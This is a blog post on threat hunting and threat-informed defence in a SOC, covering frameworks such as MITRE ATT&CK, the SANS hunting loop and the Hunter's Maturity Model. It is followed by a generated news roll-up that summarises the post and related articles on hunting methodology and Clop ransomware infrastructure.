Full Report
Originally published at Arachne Digital.Threat hunting has become one of the most important activities in modern security operations. In an age where adversaries innovate constantly, waiting for alerts is not enough. A mature SOC must be proactive, searching for adversaries before they trigger alarms, and validating whether defences truly work against real-world tactics.Threat-informed defence is the philosophy that underpins this approach. Instead of hunting based on hunches or generic indicators, teams use structured frameworks that tie hunts to adversary behaviour. This blog explores why threat hunting matters, the major frameworks you can adopt, what makes a hunt successful, and common pitfalls to avoid.Why Threat Hunting MattersAttackers Move Faster than Defenders: Threat actors exploit gaps in visibility, misconfigurations, and novel tactics, techniques and procedures (TTPs). By the time an alert fires, damage may already be done. Hunting helps you catch these subtle intrusions earlier.Detection Gaps Are Inevitable: No matter how advanced your tools, there will be blind spots. Threat hunting exposes those gaps and feeds improvements back into detection engineering.SOC Maturity and Analyst Skill Growth: Hunting develops analyst expertise, strengthens defensive posture, and transitions the SOC from reactive firefighting to proactive security.The Main Threat Hunting FrameworksDifferent organisations have proposed structured methodologies for threat hunting. Here are the most prominent:MITRE ATT&CK®-Driven HuntingThe MITRE ATT&CK® framework is one of the most widely adopted tools for structuring threat hunts. Rather than starting from scratch, analysts can anchor their hunts in a globally recognised catalogue of adversary tactics and techniques. ATT&CK doesn’t just tell you what attackers do, it provides a roadmap for how to detect them.A typical ATT&CK-driven hunting process follows these steps:Select Relevant Tactics and Techniques: Start by choosing ATT&CK techniques based on your threat model, recent intelligence, or adversary profiles. For example, if your organisation is targeted by ransomware actors, you might focus on techniques in the Execution and Impact tactics.Form a Hypothesis: Translate the chosen technique into a hypothesis. For instance: “An adversary may be using PowerShell (T1059.001) for initial execution in our environment.”Map to Available Data Sources: Use ATT&CK’s guidance on data sources to determine what telemetry you’ll need. For PowerShell execution, this might include process creation logs, PowerShell operational logs, or endpoint telemetry.Hunt in the Environment: Build queries or detections in your SIEM/EDR to test the hypothesis. Look for activity matching the ATT&CK technique, such as unusual PowerShell command lines.Investigate and Enrich: If suspicious activity is found, enrich it with context: when did it occur, which accounts were involved, is it tied to known adversary campaigns?Operationalise Findings: Feed validated findings back into your detection engineering process, for example, creating a new SIEM rule, EDR detection, or SOAR playbook mapped directly to the ATT&CK technique.Measure Coverage: Document which ATT&CK techniques are now covered, identify remaining gaps, and plan the next hunt. Over time, this builds a measurable “ATT&CK coverage map” of your environment.SANS Threat Hunting Process (The Hunting Loop)The SANS Institute’s Threat Hunting Loop provides a structured, repeatable process for hunts. It is an intelligence-driven methodology, but with defined stages that make it more than just using threat intel. The loop consists of:Hypothesis Generation: Starting with a question based on threat intelligence or observed activity.Profiling the Environment: Establishing baselines of normal behaviour to spot anomalies.Hunting: Actively testing the hypothesis by querying available data sources.Discovery and Enrichment: Investigating findings, correlating with other data, and gathering context.Operationalisation: Feeding discoveries back into detections, dashboards, or playbooks to strengthen defences.This cyclical process ensures hunts not only identify potential threats but also continuously improve detection capabilities.Hunter’s Maturity Model (HMM)The Hunter’s Maturity Model (HMM) was developed by Sqrrl, later acquired by Amazon and integrated into AWS’s security services. HMM outlines stages of hunting maturity:Level 0: No hunting, reactive operations only.Level 1: Unstructured, ad hoc hunts.Level 2: Structured, repeatable hunts.Level 3: Proactive, automated, and innovative hunts.This model remains a widely used way for SOCs to benchmark where they are on their hunting journey and chart a path toward maturity.Analytic Frameworks for Guiding Hunts (Diamond Model and Kill Chain)Diamond Model for Intrusion Analysis: Focuses on four nodes, adversary, capability, infrastructure, and victim, and the relationships between them. Analysts can pivot across these nodes to generate hypotheses and better understand adversary behaviour.Cyber Kill Chain® (Lockheed Martin): Breaks down an adversary attack into seven phases: reconnaissance, weaponisation, delivery, exploitation, installation, command and control, and actions on objectives. It helps hunters frame their work by asking: “At which phase are we most likely to detect this activity in our environment?”While not frameworks for TTPs in the same sense as MITRE ATT&CK, both models give analysts useful structures to guide hunts and anticipate adversary behaviour.TAHITI Methodology (Emerging)Some SOC teams adopt lightweight, iterative hunting methods inspired by frameworks like TAHITI (Threat-Informed Analysis for Tactical Hunts and Investigations). While not as widely formalised or adopted as ATT&CK or the SANS Loop, these approaches emphasise:Short cycles of hypothesis and testingRapid feedback into detectionsFlexibility over rigid processThis style suits agile teams who want fast results without the overhead of a full formal framework.What Makes Threat Hunting SuccessfulClear Hypotheses: Hunts should start with a focused, testable question (e.g., “Are adversaries using living-off-the-land binaries to move laterally in our network?”).Threat Intelligence Integration: Quality cyber threat intelligence provides the seed for relevant hunts and ensures defenders are testing against real-world TTPs.Data Coverage and Visibility: Hunts are only as strong as the telemetry available, endpoint, network, cloud, and identity data must be ingested and searchable.Repeatability and Documentation: Each hunt should produce lessons learned, new detections, and playbooks for future use.Feedback Loop to Detection Engineering: Findings from hunts must feed directly into SIEM/SOAR detections, improving resilience over time.Common Pitfalls to AvoidUnstructured “Fishing Expeditions”: Hunting without hypotheses wastes time and erodes analyst confidence.Over-Reliance on Tools Alone: Technology supports hunting, but analyst curiosity and critical thinking are irreplaceable.Failure to Operationalise Results: If hunts don’t improve detection coverage or incident response, they’re wasted effort.Not Measuring Value: Without metrics, such as detection coverage improvements, dwell time reduction, or successful hypothesis validation, executive buy-in may fade.Burnout and Scope Creep: Analysts tasked with constant ad hoc hunts without a process risk fatigue and inconsistent outcomes.Bringing It All Together: Threat-Informed DefenceThreat-informed defence is the practice of grounding your security operations in a clear understanding of how adversaries actually operate. Instead of building defences around generic risks or vendor-driven priorities, you align security controls, detection engineering, and response playbooks to real-world adversary TTPs.In this model, frameworks like MITRE ATT&CK, the Diamond Model, and the SANS Hunting Loop aren’t academic exercises, they are the scaffolding that keeps your defence program anchored to reality.Where threat hunting fits:Threat hunting becomes the validation engine for threat-informed defence.By testing hypotheses against adversary TTPs, hunts reveal whether your environment can detect and withstand those behaviours.Every hunt produces lessons learned: gaps in telemetry, missing detections, or untested assumptions. Those lessons feed back into detection engineering and defensive controls.Over time, this cycle ensures your defences are not just theoretical but battle-tested against the threats that matter most to you.Put simply: threat-informed defence sets the strategy, and threat hunting executes it in practice. The result is a SOC that no longer waits for attackers to announce themselves but continuously checks whether its defences stand up to the adversaries most likely to come knocking.The Role of Cyber Threat Intelligence in Threat HuntingThreat hunting is only as strong as the intelligence it’s built on. Too often, “threat intelligence” is treated as a feed of indicators of compromise (IOCs), IP addresses, file hashes, or domain names. While IOCs can support detection, they cannot drive threat hunting. By the time an IOC is distributed, it may already be obsolete, burned, or irrelevant to your environment. Hunting based on these alone quickly becomes a game of whack-a-mole.Real threat hunting requires intelligence that answers bigger questions:Which threat actors are likely to target my industry and geography? Understanding the adversaries most relevant to your organisation ensures you’re not chasing ghosts, but focusing on real risks.Which techniques do those adversaries use? Mapping adversary behaviour to frameworks like MITRE ATT&CK highlights where you should focus your hunts and what data you’ll need.When were those techniques and campaigns active? Bounding intelligence in timeframes matters. Techniques used three years ago may not be relevant today, while emerging campaigns might demand immediate hunts.Good intelligence informs what to hunt, when to hunt it, and why it matters. This elevates hunting from ad hoc curiosity to a strategic capability.Arachne Digital provides intelligence that goes beyond static indicators. Our threat intelligence highlights the adversaries most likely to target you, the techniques they employ, and the industries and regions they focus on, all bounded in time. This is the type of intelligence that fuels proactive hunts, closes detection gaps, and enables threat-informed defence.Reach out to us for more details.Final ThoughtsThreat hunting is one of the clearest signs of SOC maturity. It demands curiosity, structure, and a willingness to learn from both successes and failures. Whether you start with ATT&CK, intelligence-driven hunts, or a maturity model, the key is to build a repeatable process that grows with your organisation.These insights are not abstract theory, they’re the foundation of how modern defenders close detection gaps, validate assumptions, and build resilience against today’s adversaries.Threat Hunting: Building Threat-Informed Defence in Your SOC was originally published in MeetCyber on Medium, where people are continuing the conversation by highlighting and responding to this story.
Analysis Summary
# Morning News Roll-up 2024-05-22
## Overview
Today's report covers the strategic implementation of threat hunting to build threat-informed defenses, alongside a technical analysis of Clop ransomware network infrastructure.
## Top Stories
### Threat Hunting: Building Threat-Informed Defence in Your SOC
- Summary: This report outlines the shift from reactive to proactive security operations. It highlights major frameworks like MITRE ATT&CK and the SANS Hunting Loop to move SOCs beyond basic alert monitoring and toward structured adversary behavior validation.
- Source: hxxps://www[.]arachne[.]digital/blogs/threat-hunting-building-threat-informed-defence-in-your-soc
### The Art of Threat Hunting: Core Methodologies
- Summary: A deep dive into the Hunter's Maturity Model (HMM) and behavioral analytics. It emphasizes that successful hunting requires moving away from static Indicators of Compromise (IoCs) toward identifying Tactics, Techniques, and Procedures (TTPs).
- Source: hxxps://medium[.]com/@jaynagrecha/the-art-of-threat-hunting-ba6e385d6cdc
### CL0P Ransomware: Dissecting Network Infrastructure
- Summary: Technical research investigating the specific network protocols and infiltration methods used by the Clop ransomware group, focusing on their lateral movement and command-and-control (C2) setups.
- Source: hxxps://rakeshkrish[.]medium[.]com/cl0p-ransomware-dissecting-network-75d4761deedc
---
# Main Topic
**Proactive Threat Hunting and Threat-Informed Defence Strategy**
A strategic approach to modernizing Security Operations Centers (SOC) by transitioning from reactive alert-based monitoring to proactive, hypothesis-driven hunting based on real-world adversary behaviors.
## Key Points
- **Shift to Proactive Stance:** Modern attackers innovate faster than traditional defenses; hunting catches intrusions before alerts fire.
- **Validation Engine:** Threat hunting serves as the practical validation for "Threat-Informed Defence," testing if security controls actually stand up to known TTPs.
- **Operationalization:** Successful hunts must feed findings (telemetry gaps, new detections) back into Detection Engineering via SIEM/SOAR.
- **Beyond Indicators:** Effective hunting focuses on behaviors (TTPs) rather than static IoCs like IP addresses or file hashes, which are easily "burned" by attackers.
## Threat Actors
- **Ransomware Groups:** Specifically highlighted as a primary driver for hunting Execution and Impact tactics.
- **Clop Ransomware:** Mentioned in associated research regarding network infiltration techniques.
- **Industry-Specific Adversaries:** The report emphasizes identifying actors relevant to an organization's specific geography and vertical.
## TTPs
- **MITRE ATT&CK Framework:** Used to anchor hunts in recognized adversary tactics.
- **Command and Scripting Interpreter (T1059.001):** Specifically PowerShell execution for initial access or persistence.
- **Living-off-the-Land (LotL):** Use of legitimate binaries for lateral movement.
- **Hypothesis-Based Hunting:** Formulating testable questions (e.g., "Is PowerShell being used for initial execution?").
- **Environmental Profiling:** Establishing baselines to identify anomalies in normal behavior.
## Affected Systems
- **Endpoint Systems:** Specifically Windows environments utilizing PowerShell.
- **Active Directory/Identity:** Mentioned as critical data sources for identifying compromised accounts.
- **Network Infrastructure:** Targeted by groups like Clop for lateral movement.
- **Cloud Environments:** Noted as a necessary telemetry source for comprehensive visibility.
## Mitigations
- **Detection Engineering Feedback Loop:** Creating SIEM rules and EDR detections based on validated hunt findings.
- **Telemetry Enhancement:** Closing visibility gaps in PowerShell operational logs and process creation logs.
- **SOC Maturity Modeling:** Using the Hunter’s Maturity Model (HMM) to benchmark and automate hunting processes.
- **Intelligence Integration:** Utilizing CTI to prioritize hunts based on currently active campaigns rather than historical data.
## Conclusion
Threat hunting is a critical indicator of SOC maturity. To be effective, it must move away from "fishing expeditions" and toward a structured, repeatable loop. Organizations should adopt the MITRE ATT&CK framework and the SANS Hunting Loop to ensure that every hunt improves the overall defensive posture and reduces adversary dwell time.